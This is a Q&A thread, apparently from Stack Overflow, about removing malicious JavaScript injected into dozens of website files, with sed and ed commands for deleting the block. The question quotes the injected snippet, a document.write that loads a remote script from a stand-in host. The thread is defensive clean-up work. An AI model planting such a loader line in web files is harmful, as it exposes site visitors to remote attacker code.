# How to delete multiple lines from text file, including matched line?

Tags: sed, centos, pattern-matching

I found some malicious JavaScript inserted into dozens of files.

The malicious code looks like this:

```
/*123456*/
document.write('<script type="text/javascript" src="http://maliciousurl.com/asdf/KjdfL4ljd?id=9876543"></script>');

/*/123456*/
```

Some kind of opening tag, the `document.write` that inserts the remote script, a seemingly empty line, and then their "closing tag."

In a comment on [this Stack Overflow answer](https://stackoverflow.com/questions/5410757/sed-delete-a-line-containing-a-specific-string) I found out how to delete a single line in a single file.

```
sed -i '/pattern to match/d' ./infile
```

But I need to delete one line before, and two lines after, and again it is in at least a few dozen files.

So I think I could perhaps use grep -lr to find the file names, then pass each one to `sed` and somehow remove the matching line, as well as one before and 2 after (4 lines total). Pattern to match could be `"\n*\nmaliciousurl\n\n*\n"`?

I also tried this, trying to replace the pattern with empty string. The `.*` are the hex numbers in the opening/closing tags, and also the stuff between the tags.

```
sed -e '\%/\*.*\*/.*maliciousurl.*/\*/.*\*/%,\%%d' test.js
```

Answer (score 1):

You need to match on the begin and end comments, not the `document.write` line:

```
sed -e '\%/\*123456\*/%,\%/\*/123456\*/%d'
```

This uses the `%` symbol in place of the more normal `/` to delimit the patterns, which is usually a good idea when the pattern contains slashed and doesn't contain `%` symbols. The leading `\` tells `sed` that the following character is the pattern delimiter.  You can use any character (except backslash or newline) in place of the `%`; <kbd>Control-A</kbd> is another good one to consider.

From the `sed` manual on Mac OS X:

> In a context address, any character other than a backslash ('`\`') or newline
>             character may be used to delimit the regular expression.  Also, putting a backslash character before the delimiting character causes the character to be
>             treated literally.  For example, in the context address `\xabc\xdefx`, the RE
>             delimiter is an '`x`' and the second '`x`' stands for itself, so that the regular expression is '`abcxdef`'.

Now, if in fact your pattern isn't as easily identified as the `/*123456*/` you show in the example, then maybe you are forced to key off the malicious URL.  However, in that case, you cannot use `sed` very easily; it cannot do relative offsets (`/x/+1` is not allowed, let alone `/x/-1`).  At that point, you probably fall back on `ed` (or perhaps `ex`):

```
ed - $file <<'EOF'
g/maliciousurl.com/.-1,.+2d
w
q
EOF
```

This does a global search for the malicious URL, and with each occurrence, deletes from the line before the current line (`.-1`) to two lines after it (`.+2`).  Then write the file and quit.

Comment: your pattern starts with `\%`. Are you escaping the percent? Before iI saw your answer I tried something similar, using `~` as delimiter, and it did not work: `sed -i 's~/\**\*/*/\*/*\*/~~g' test.js`

Comment: Also note that the malicious code seems to be added to the bottom of every file. And it is not always the same '123456'. In fact, I think they are hexadecimal digits. I've found some like this: "028b70"

Comment: I tried your `sed -e` command, but I replaced '123456' with `*`. It seems to have removed the malicious closing tag, but nothing else.

Comment: These details are important information; they materially affect the answer.  I've addressed the `\%` notation with a quote from the manual.  Your regex doesn't match things correctly.  You might have been OK with `s~/\*.*\*/~~` to eliminate the before comments if nothing else in your file uses C-style comments.  You need to distinguish between shell `*` globbing and regular expression `*` which means 0 or more of the preceding term in the regex.

Comment: ahhh I see. I can't just use `*` by itself. It has to be attached to something. Can I use `[hex]*` or something like that?

Comment: Yes, you can use `[hex]*` to look for zero or more characters from the letters `h`, `e` and `x` in any sequence.  If you want hex digits, then you need `[[:xdigit:]]*` (or if you want 1-4 of them, then (classically) `[[:xdigit:]]\{1,4\}`, or in modern versions with either `-E` (Mac OS X, BSD) or `-r` (GNU), `[[:xdigit:]]{1,4}`.

Comment: lol, you're funny. [hex]* is definitely not what I'm looking for. [[:xdigit:]] might be worth a try. I'm doing this on CentOS 6 by the way. I ended up cleaning up another 40 files manually with VIM. There are still other "infected" files on the server I can test this on, though.